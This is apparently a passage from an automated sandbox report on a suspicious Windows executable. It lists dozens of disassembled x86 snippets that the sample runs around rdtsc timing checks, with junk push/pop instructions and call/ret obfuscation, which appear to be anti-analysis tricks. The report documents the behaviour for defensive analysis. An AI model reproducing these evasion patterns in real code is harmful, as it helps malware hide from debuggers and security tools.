Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 852E0E second address: 852E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F7F1CE19ABAh 0x0000000b jmp 00007F7F1CE19AB4h 0x00000010 popad 0x00000011 add dword ptr [esp], 1C21066Fh 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F7F1CE19AA8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D3751h] 0x00000038 lea ebx, dword ptr [ebp+12454C17h] 0x0000003e adc dx, C6B3h 0x00000043 jmp 00007F7F1CE19AB8h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push ecx 0x0000004d pop ecx 0x0000004e ja 00007F7F1CE19AA6h 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 853000 second address: 853071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A772h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7F1D21A777h 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2B20h], ecx 0x00000016 push 00000000h 0x00000018 jmp 00007F7F1D21A770h 0x0000001d call 00007F7F1D21A769h 0x00000022 jng 00007F7F1D21A770h 0x00000028 pushad 0x00000029 jl 00007F7F1D21A766h 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 popad 0x00000032 push eax 0x00000033 push ecx 0x00000034 push ecx 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 pop ecx 0x00000038 pop ecx 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d push ebx 0x0000003e pushad 0x0000003f push edx 0x00000040 pop edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 853071 second address: 853124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edi 0x00000009 jg 00007F7F1CE19AACh 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F7F1CE19AABh 0x00000019 pop eax 0x0000001a mov dword ptr [ebp+122D3241h], eax 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F7F1CE19AA8h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c call 00007F7F1CE19AB4h 0x00000041 mov esi, 43BBC238h 0x00000046 pop edi 0x00000047 mov edx, 4F8471E5h 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push edi 0x00000051 call 00007F7F1CE19AA8h 0x00000056 pop edi 0x00000057 mov dword ptr [esp+04h], edi 0x0000005b add dword ptr [esp+04h], 00000015h 0x00000063 inc edi 0x00000064 push edi 0x00000065 ret 0x00000066 pop edi 0x00000067 ret 0x00000068 push 00000003h 0x0000006a mov ecx, dword ptr [ebp+122D1C25h] 0x00000070 push 952E854Dh 0x00000075 push eax 0x00000076 push edx 0x00000077 push edi 0x00000078 jmp 00007F7F1CE19AB7h 0x0000007d pop edi 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853124 second address: 853172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2AD17AB3h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F7F1D21A768h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov cx, bx 0x0000002d lea ebx, dword ptr [ebp+12454C2Bh] 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C15 second address: 872C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870EB1 second address: 870EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870FE9 second address: 87100A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7F1CE19AA6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F1CE19AB0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87100A second address: 87100E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8713EC second address: 871406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AB4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872730 second address: 87274F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1D21A778h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877335 second address: 877339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877339 second address: 877351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F7F1D21A768h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877351 second address: 877379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F1CE19AB5h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877379 second address: 87737E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877473 second address: 87748D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F1CE19AAEh 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87748D second address: 877491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 877491 second address: 8774C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jnl 00007F7F1CE19AA8h 0x00000012 jp 00007F7F1CE19AA8h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push esi 0x0000001e jmp 00007F7F1CE19AABh 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8774C7 second address: 8774CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8774CD second address: 8774D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DEE5 second address: 87DF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7F1D21A766h 0x0000000a jmp 00007F7F1D21A774h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E1F6 second address: 87E218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F7F1CE19AAAh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E218 second address: 87E22D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F1D21A76Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E22D second address: 87E238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E238 second address: 87E23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 881ADD second address: 881AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F7F1CE19AA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882266 second address: 88227B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pop esi 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88227B second address: 882281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882281 second address: 88229D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7F1D21A775h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88229D second address: 8822D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F7F1CE19AB4h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7F1CE19AB1h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88263E second address: 882649 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882649 second address: 882663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7F1CE19AB1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882663 second address: 882668 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882839 second address: 88283D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88283D second address: 882843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882843 second address: 882855 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7F1CE19AA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8828DF second address: 8828FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1D21A778h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882D93 second address: 882D9D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F1CE19AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882E0B second address: 882E15 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882E15 second address: 882E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1CE19AAFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882E28 second address: 882E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882E37 second address: 882E8B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1CE19AACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F7F1CE19AA8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor dword ptr [ebp+122D326Dh], edi 0x0000002b push eax 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007F7F1CE19AB2h 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 jo 00007F7F1CE19AA6h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F3F second address: 882F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F43 second address: 882F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F7F1CE19AACh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88335D second address: 883362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883362 second address: 88336C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7F1CE19AA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883883 second address: 88388D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884227 second address: 88422C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88422C second address: 884232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884106 second address: 88410A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884232 second address: 8842BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F7F1D21A76Fh 0x0000000d nop 0x0000000e xor esi, 5CE2FCCDh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F7F1D21A768h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push eax 0x00000031 jnc 00007F7F1D21A76Ch 0x00000037 pop esi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F7F1D21A768h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D18B1h], eax 0x0000005a push eax 0x0000005b pushad 0x0000005c pushad 0x0000005d jmp 00007F7F1D21A76Bh 0x00000062 pushad 0x00000063 popad 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 push esi 0x00000068 pop esi 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885384 second address: 8853E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F7F1CE19AA6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F7F1CE19AA8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D3191h], eax 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 jmp 00007F7F1CE19AAEh 0x00000039 pop esi 0x0000003a xchg eax, ebx 0x0000003b jc 00007F7F1CE19AAEh 0x00000041 jbe 00007F7F1CE19AA8h 0x00000047 pushad 0x00000048 popad 0x00000049 push eax 0x0000004a je 00007F7F1CE19ABEh 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8867A4 second address: 8867AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888D2 second address: 8888D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888D7 second address: 888946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1D21A76Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F7F1D21A775h 0x00000014 jmp 00007F7F1D21A76Fh 0x00000019 pop edx 0x0000001a nop 0x0000001b or dword ptr [ebp+122D31D0h], edx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F7F1D21A768h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 jmp 00007F7F1D21A76Ah 0x00000045 pop edi 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a js 00007F7F1D21A766h 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888946 second address: 88894B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 886F57 second address: 886F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A293 second address: 88A307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jc 00007F7F1CE19AA6h 0x00000012 sub edi, dword ptr [ebp+122D2132h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F7F1CE19AA8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push 00000000h 0x00000036 jmp 00007F7F1CE19AB7h 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007F7F1CE19AB5h 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C1A3 second address: 88C1A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888699 second address: 88869F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D950 second address: 88D954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88869F second address: 8886A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886A3 second address: 8886A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D954 second address: 88D965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88E882 second address: 88E88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886A7 second address: 8886B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F7F1CE19AA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA3D second address: 88DA47 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886B9 second address: 8886BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA47 second address: 88DA4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FC79 second address: 88FC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8886BD second address: 8886C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890CCE second address: 890D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AAEh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007F7F1CE19AB1h 0x00000013 pushad 0x00000014 jmp 00007F7F1CE19AB3h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891AA2 second address: 891AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891AA6 second address: 891AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891AB5 second address: 891ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892AE0 second address: 892AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892AE6 second address: 892AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
